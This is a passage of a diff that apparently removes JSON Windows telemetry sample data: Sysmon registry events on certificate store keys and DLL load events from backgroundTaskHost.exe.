"registry_value": "CTLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689180000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571689650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "MrmCoreR.dll", - "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689650000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689800000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571690270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690270000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690580000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690580000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "policymanager.dll", - "image_path": "C:\\Windows\\System32\\policymanager.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690580000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690270000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "biwinrt.dll", - "image_path": "C:\\Windows\\System32\\biwinrt.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690270000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": 
